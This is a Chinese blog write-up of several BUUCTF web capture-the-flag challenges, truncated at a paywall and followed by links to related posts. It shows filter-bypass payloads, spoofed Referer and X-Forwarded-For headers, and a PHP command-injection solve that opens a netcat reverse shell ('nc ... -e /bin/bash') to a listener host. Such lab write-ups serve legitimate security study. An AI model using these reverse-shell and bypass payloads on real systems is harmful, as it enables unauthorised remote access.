BUUCTFweb刷题记录

最新推荐文章于 2024-06-24 16:17:13 发布
最新推荐文章于 2024-06-24 16:17:13 发布
阅读量2.8k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41628669/article/details/103706338
版权
本文记录了作者参与的多个CTF比赛中的web挑战,涉及多种漏洞利用技术,如HTTP参数污染、文件包含、SQL注入、JWT签名破解、PHP反序列化等。通过分析源码、利用逻辑漏洞和构造特定payload,成功解密flag。
摘要由CSDN通过智能技术生成

[极客大挑战 2019]BuyFlag

header里头有个user=0,将其修改成1
在这里插入图片描述
再post money=100000001&password=404a
发现money参数过长,使用数组绕过
最后post money[]=100000001&password=404a

[极客大挑战 2019]Http

查看源码可知有一个Secret.php
访问Secret.php,根据提示,添加

referer: https://www.Sycsecret.com
User-Agent: Syclover
X-Forwarded-for: 127.0.0.1

[BJDCTF 2nd]duangShell

知识点:nc命令反弹shell
在这里插入图片描述
题目提示源码泄露,访问/.index.php.swp下载并修复源码

<?php

error_reporting(0);
echo "how can i give you source code? .swp?!"."<br>";
if (!isset($_POST['girl_friend'])) {
   
	die("where is P3rh4ps's girl friend ???");
}
else 
	{
       $girl = $_POST['girl_friend'];
	if (preg_match('/\>|\\\/', $girl))
		die('just girl');
	else if (preg_match('/ls|phpinfo|cat|\%|\^|\~|base64|xxd|echo|\$/i', $girl)) 
	{ 
		echo "<img src='img/p3_need_beautiful_gf.png'> <!-- He is p3 -->";    
	} 
	else {
      exec($girl);        //duangShell~~~~    
	} 
}
?>

在buu新建一个小号,打开Basic Labs下的一台靶机,用于监听
监听命令
攻击机

nc -lvvp 4455

靶机上执行

nc 174.1.70.57 4455 -e /bin/bash

在这里插入图片描述
连接成功
在这里插入图片描述
最后找flag即可
可使用命令

find -name flag

[MRCTF2020]套娃

进去后查看源码得到

<!--
//1st
$query = $_SERVER['QUERY_STRING'];

 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
   
    die('Y0u are So cutE!');
}
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
   
    echo "you are going to the next ~";
}
!-->

$query中不能出现_或者%5f,可以使用.绕过
$b_u_p_t要等于23333,但是不能被匹配到23333,在末尾添加%0a绕过

payload: ?b.u.p.t=23333%0a

得到提示secrettw.php
访问并查看源码得到一堆jsfuck代码

[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][[]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]
最低0.47元/天 解锁文章
「已注销」
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF-WEB刷题记录-1
weixin_44145820的博客
04-06 822
目录[HCTF 2018]WarmUp[强网杯 2019]随便注[护网杯 2018]easy_tornado[SUCTF 2019]EasySQL[HCTF 2018]admin[RoarCTF 2019]Easy Calc[极客大挑战 2019]EasySQL[强网杯 2019]高明的黑客[极客大挑战 2019]Havefun[SUCTF 2019]CheckIn[CISCN2019 华北赛区 ...
BUUCTF——Basic题解
Zichel77的博客
08-17 5710
所以我们不能将input设为具体的值,而是在序列化执行,令input=&correct。文件包含在 php 中,涉及到的危险函数有四个,分别是 include()、include_once()、require()、require_once()。程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程一般被称为文件包含。于是涉及到了md5绕过的问题,md5这个地方可以用md5弱碰撞,因为是弱类型比较。以下几个的md5弱类型比较均相等。...
CTF练习题
qq_53460654的博客
12-15 4410
端午就该吃粽子 打开环境没有界面 直接目录扫描得到 login.php 访问得到 发现存在文件包含 试试目录跳跃,发现被过滤掉了 那就直接php为协议读源码 http://www.bmzclub.cn:22020/login.php?zhongzi=php://filter/read=convert.base64-encode/resource=index.php 解码得到 <?php error_reporting(0); if (isset($_GET['url'])) {
BUUCTF--Web篇详细wp_buuctfweb
最新发布
2401_84301352的博客
06-24 629
php.iniInclude然后Base64解码就可以得到flag。
BUUCTF——Basic
计算机硕士的博客
06-16 1704
BUUCTF——Basic(详细版),包括了做题思路和详细步骤。Linux Labs、BUU LFI COURSE 1、BUU BRUTE 1、BUU SQL COURSE 1。
【网络安全CTFBUUCTF(Basic篇)
信安是不可或缺的一部分!
05-11 6341
参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171。admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
BUUCTF-Basic
5L2g556F5ZWl77yf
11-08 2797
文章目录BasicLinux LabsBUU LFI COURSE 1Upload-Labs-LinuxBUU CODE REVIEW 1BUU BRUTE 1BUU SQL COURSE 1sqli-labsBUU UPLOAD COURSE 1BUU BURP COURSE 1BUU XSS COURSE 1 Basic Linux Labs ssh连接/目录下 BUU LFI COURSE 1 <?php /** * Created by PhpStorm. * User: jinzhao
BUUCTF 还原大师 1
YueXuan_521的博客
07-01 880
BUUCTF 还原大师 1
buuctf Basic
自强不息
02-16 767
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
buuctf crypto 【还原大师】解题记录
jsbbd12的博客
09-09 637
buuctf刷题记录
CTF-MISC:BUUCTF练习汇总(26-40题)
燕麦葡萄干的博客
08-03 1870
.-. ----. …- ----. -.-. -…----- .---- —…----- ----. …— ----. .---- ----. .---- -.-.4)key_part_one中NUL文件包含了前半段flag,key_part_two中where_is_flag_part_two.txt:flag_part_two_is_here.txt文件包含了后半段flag。binwalk+foremost分离得到zip压缩包,解压后得到的文件里存在flag.txt,打开即可获取到flag。
BUUCTF笔记之Basic部分WP
克格莫(有需要的私信)
06-04 4883
1.Linux Labs 这题就是熟悉一下ssh了。 登录找到flag.txt: 2.Java Sec Code 这题有点无语,感觉更像是宣传Java Sec Code这个项目。 拿flag:http://057bfb68-fe8f-4ecb-ad38-ad35f029e01b.node3.buuoj.cn/rce/exec?cmd=env 题外话,对于学习java漏洞来说,这个github项目确实是很好的,我们不能仅仅局限于拿flag刷分数,更多的是要深入研究代码背后的思想。 .
BUUCTF Crypto 还原大师
weixin_62434171的博客
06-01 658
BUUCTF Crypto 还原大师解题思路
buuctf 还原大师 (md5爆破)
emmmk_suibian的博客
03-26 2283
打开看到这个,就是通过现在已有的信息,将原文中问好部分用字母代替,每个都用哈希加密一遍,然后对照题目所给元素E903,进行一次次遍历,最后得到完全匹配的md5值,就是本题的flag。 通过python实现 import hashlib #print hashlib.md5(s).hexdigest().upper() k = 'TASC?O3RJMV?WDJKX?ZM' for i in range(26): temp1 = k.replace('?',str(chr(65+i)),1) #用as.
BUUCTF-Basic部分(4道)
weixin_45908624的博客
05-24 1733
buuctf
BUUCTF:Basic 解析(一)
Flag少侠的博客
04-28 935
Linux Labs、BUU LFI COURSE 1、BUU BRUTE 1、BUU SQL COURSE 1
BUUCTF_MISC题解
热门推荐
m0_52885531的博客
05-30 2万+
BUUCTF_MISC题解 第二题 金三胖 将GIF图片用ps进行逐帧分解,可以得到三张特殊的照片 直接将三个照片里的内容拼接起来就好 第三题 二维码 下载好附件解压后发现是一个.png文件的二维码 用CQR扫描后得到二维码的结果 发现并没有得到想要的flag,并且提示我们flag并不在这李,那我们就用二进制编辑器打开看一看在哪里。 .png的文件尾是AE 42 60 82,按理来说在文件尾之后就应该结束,我们却发现png的文件尾后还跟着50 4B 03 04,这是.zip的文件头,说明在该照片
BUUCTF MISC——webshell后门
m0_74093152的博客
02-23 427
BUUCTFMISC——webshell后门
buuctfWeb11
10-08
buuctfWeb11是一个CTF比赛中的一个Web题目。根据提供的引用内容,我们可以得到以下信息: 1. 蚁剑连接的URL地址为:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值